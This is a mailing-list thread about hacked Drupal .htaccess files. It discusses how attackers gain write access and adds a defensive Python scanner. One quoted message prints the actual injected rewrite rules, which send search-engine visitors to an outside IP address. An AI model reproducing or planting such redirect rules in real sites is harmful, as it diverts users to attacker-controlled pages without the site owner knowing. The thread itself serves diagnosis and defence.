All they need to do is get their PHP script to run on your server.
That will allow them to write or modify files, including .htaccess.
They can do that with a Remote File Inclusion (RFI) attack. Those
would show in your site logs.
A security hole in Drupal or other software would allow them to upload
a script (such as for a forum message attachment, avatar, etc.), and
then run it.
Chances are good it was done by script.
The .htaccess code provided by Anirban does prevent anyone from
viewing your .htaccess file with their browser, but it won't prevent
modifying the file with PHP or by FTP. On some server configurations,
a malicious "neighbor" on your shared server could also conduct a PHP
attack that would be able to modify your files. If a shared server got
severely compromised, the attackers could get access to all the sites
on it. You could check whether other sites on your server are also
flagged/compromised.
.htaccess must have permissions of 644, same as any other file. If
it's locked down any tighter than that, Apache itself won't be able to
read it, which will generate errors.
Reading it isn't really the problem, anyway. They are able to write to
it, which means there is a security hole somewhere.
On Nov 20, 12:05 pm, Jesse Nicola <[EMAIL PROTECTED]> wrote:
> Yep.
>
> What I want to know is how they are getting such widespread access to
> .htaccess files, and what we can do to prevent this!
>
>
>
> UseShots wrote:
> > Thanks Jesse,
>
> > Here is the code inserted into .htaccess
> > -------------
> > RewriteEngine On
> > RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
> > RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
> > RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
> > RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
> > RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
> > RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
> > RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
> > -------------
>
> > As you can see, it only redirects search engine traffic. Site owners
> > are usually unaware of this until someone tells them.
>
> > Denis
> > http://www.UnmaskParasites.com
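
As an added example (not part of the original messages), here is a Python check a site owner could run over a document root to flag the kind of injected rule quoted above, along with any .htaccess that group or others can write to. The function names and the `redirect.example` sample are constructed for illustration; the engine list comes from the quoted rules.

```python
import os
import re
import stat

# Search-engine names taken from the injected rules quoted in this thread.
ENGINES = ("google", "aol", "msn", "altavista", "ask", "yahoo")
COND = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
RULE = re.compile(r"^\s*RewriteRule\s+\S+\s+(\S+)", re.I)

# Constructed sample: same shape as the quoted injection, placeholder host.
SAMPLE = """RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://redirect.example/in.html?s=ix [R,L]
"""

def find_referer_redirects(text, own_hosts=()):
    """Return (line_no, target) for every RewriteRule that points at a foreign
    host and is guarded by search-engine HTTP_REFERER conditions."""
    findings, pending = [], False
    for no, line in enumerate(text.splitlines(), 1):
        cond = COND.match(line)
        if cond:
            pending |= any(e in cond.group(1).lower() for e in ENGINES)
            continue
        rule = RULE.match(line)
        if rule:
            host = re.match(r"https?://([^/:?]+)", rule.group(1), re.I)
            if pending and host and host.group(1).lower() not in own_hosts:
                findings.append((no, rule.group(1)))
            pending = False  # RewriteCond lines apply only to the next rule
    return findings

def writable_by_group_or_other(mode):
    """True when group or others can write (looser than the 644 named above)."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def scan_tree(root, own_hosts=()):
    """Walk a document root; report each .htaccess with findings or loose mode."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = find_referer_redirects(fh.read(), own_hosts)
            loose = writable_by_group_or_other(os.stat(path).st_mode)
            if hits or loose:
                report[path] = {"redirects": hits, "loose_mode": loose}
    return report
```

Pass your own hostnames in `own_hosts` so legitimate canonical-host redirects are not reported. A clean mode does not rule out tampering, since a PHP script running as the file owner can still rewrite the file.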